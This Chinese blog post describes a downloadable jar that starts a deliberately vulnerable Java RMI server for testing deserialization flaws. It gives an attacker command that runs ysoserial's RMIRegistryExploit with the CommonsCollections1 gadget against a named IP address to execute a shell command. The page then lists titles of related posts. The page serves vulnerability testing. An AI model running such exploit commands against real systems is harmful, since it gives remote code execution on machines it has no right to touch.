功能:

命令行启动jar包,用户自定义启动RMI端口。默认内置Apache Commons Collections。只需一键启动即可测试java反序列化漏洞。

启动服务:

[root@sevck_v3 tmp]# java -jar rmi.jar

This rmi port is:

java rmi server start!

如果已经绑定端口:

[root@sevck_v3 tmp]# java -jar rmi.jar

This rmi port is:

java.rmi.server.ExportException: Port already in use: ; nested exception is:

    java.net.BindException: Address already in use (Bind failed)

    at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:)

    at sun.rmi.transport.tcp.TCPTransport.exportObject(TCPTransport.java:)

    at sun.rmi.transport.tcp.TCPEndpoint.exportObject(TCPEndpoint.java:)

    at sun.rmi.transport.LiveRef.exportObject(LiveRef.java:)

    at sun.rmi.server.UnicastServerRef.exportObject(UnicastServerRef.java:)

    at sun.rmi.registry.RegistryImpl.setup(RegistryImpl.java:)

    at sun.rmi.registry.RegistryImpl.<init>(RegistryImpl.java:)

    at java.rmi.registry.LocateRegistry.createRegistry(LocateRegistry.java:)

    at rmi.server.Server.main(Server.java:)

Caused by: java.net.BindException: Address already in use (Bind failed)

    at java.net.PlainSocketImpl.socketBind(Native Method)

    at java.net.AbstractPlainSocketImpl.bind(AbstractPlainSocketImpl.java:)

    at java.net.ServerSocket.bind(ServerSocket.java:)

    at java.net.ServerSocket.<init>(ServerSocket.java:)

    at java.net.ServerSocket.<init>(ServerSocket.java:)

    at sun.rmi.transport.proxy.RMIDirectSocketFactory.createServerSocket(RMIDirectSocketFactory.java:)

    at sun.rmi.transport.proxy.RMIMasterSocketFactory.createServerSocket(RMIMasterSocketFactory.java:)

    at sun.rmi.transport.tcp.TCPEndpoint.newServerSocket(TCPEndpoint.java:)

    at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:)

    ...  more

工具下载: http://scan.javasec.cn/java/rmi.jar

攻击者:

java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 121.42.182.208 1234 CommonsCollections1  "touch /tmp/test"

工具ysoserial自行github下载

[JAVA反序列化DEMO]利用RMI进行反序列化一键启动工具的更多相关文章

  1. JAVA基础4---序列化和反序列化深入整理(JDK序列化)

    一.什么是序列化和反序列化? 序列化:将对象状态信息转化成可以存储或传输的形式的过程(Java中就是将对象转化成字节序列的过程) 反序列化:从存储文件中恢复对象的过程(Java中就是通过字节序列转化成 ...

  2. Shiro反序列化漏洞利用汇总(Shiro-550+Shiro-721)

    Apache Shiro是一个强大易用的Java安全框架,提供了认证.授权.加密和会话管理等功能.Shiro框架直观.易用,同时也能提供健壮的安全性. 文章目录: 1.Shiro rememberMe ...

  3. fastjson反序列化-JdbcRowSetImpl利用链

    fastjson反序列化-JdbcRowSetImpl利用链 JdbcRowSetImpl利用链 fastjson反序列化JdbcRowSetImpl - Afant1 - 博客园 (cnblogs. ...

  4. windows环境下protobuf的java操作{编译,序列化,反序列化}

    google protocol buffer的使用和原理 概况: Protocol Buffers(也就是protobuf)是谷歌的语言中立的.平台中立的.可扩展的用于序列化结构化的数据: windo ...

  5. Java对象的serialVersion序列化和反序列化

    Java基础学习总结——Java对象的序列化和反序列化 一.序列化和反序列化的概念 把对象转换为字节序列的过程称为对象的序列化. 把字节序列恢复为对象的过程称为对象的反序列化. 对象的序列化主要有两种 ...

  6. Java基础中的RMI介绍与使用

    今天在这边介绍一下Java基础中的rmi使用.其实rmi有什么样的使用场景呢?它跟webservice有什么区别呢?其实webservice主要是可以跨语言实现项目间的方法调用,而rmi只是java内 ...

  7. C# 制作Java +Mysql+Tomcat 环境安装程序,一键式安装

    原文:C# 制作Java +Mysql+Tomcat 环境安装程序,一键式安装 要求: JDK.Mysql.Tomcat三者制作成一个安装包, 不能单独安装,安装过程不显示三者的界面, 安装完成要配置 ...

  8. 微信公众号Java接入demo

    微信公众号Java接入demo 前不久买了一台服务,本来是用来当梯子用的,后来买了一个域名搭了一个博客网站,后来不怎么在上面写博客一直闲着,最近申请了一个微信公众号就想着弄点什么玩玩.周末没事就鼓捣了 ...

  9. 【RMI】使用Java反射机制实现RMI

    主要包括如下类 RMIBeansManager.java RMIDemo.java RMIService.java RMIVO.java SayHello.java RMIVO.java packag ...

随机推荐

  1. java定时任务Quartz Demo(2.X)

    直接上代码 public class HelloQuartz implements Job{ @Override public void execute(JobExecutionContext Jec ...

  2. 泛型学习第一天:List与IList的区别 (三)

    已经有很多人讨论过IList和List的区别,恩,我也赞同其中的一些观点,其实他们二者也是有优有劣的,看你着重用在哪个方面,先贴一下我赞同的意见,基本上也都是网友们总结的. 首先IList 泛型接口是 ...

  3. MapReduce-计数器

    计数器 计数器是收集作业统计信息的有效手段之一,用于质量控制或应用级统计.计数器还可辅助诊断系统故障.根据计数器值来记录某一特定事件的发生比分析一堆日志文件容易得多.内置计数器Hadoop为每个作业维 ...

  4. QT 实现拖放功能

    1. 文档拖放 获取文件名 mainwindow.h #ifndef MAINWINDOW_H #define MAINWINDOW_H #include <QMainWindow> #i ...

  5. Eureka、Ribbon、Feign常见问题及解决

    1.Eureka常见问 1.1.Eureka Enviroment 的配置 eureka.enviroment=product 参考 https://github.com/Netflix/eureka ...

  6. codeforces 777C.Alyona and Spreadsheet 解题报告

    题目链接:http://codeforces.com/problemset/problem/777/C 题目意思:给出一个 n * m 的矩阵,然后问 [l, r] 行之间是否存在至少一列是非递减序列 ...

  7. chromedriver驱动的浏览器和真实浏览器之间的差异

    一. 打印百度首页底部的声明 如图,想打印@2018 Baidu...后面的一长串文字,可以通过class name定位的形式 可以看出,只有一个class name是"copyright- ...

  8. String随笔

    1.古罗马皇帝凯撒在打仗时曾经使用过以下方法加密军事情报:,请编写一个程序,使用上述算法加密或解密用户输入的英文字串要求设计思想.程序流程图.源代码.结果截图. 设计思想:1)定义一个String类型 ...

  9. 【WCF】利用WCF实现上传下载文件服务

    引言     前段时间,用WCF做了一个小项目,其中涉及到文件的上传下载.出于复习巩固的目的,今天简单梳理了一下,整理出来,下面展示如何一步步实现一个上传下载的WCF服务. 服务端 1.首先新建一个名 ...

  10. JVM_总结_03_Java发展史

    一.前言 通过上一节,我们对整个java的技术体系有了一定的了解. 这一节我们来看下Java的发展史. 二.Java发展史 1.时间线 序号 发布日期 JDK 版本 新特性 详细说明 0 1991.0 ...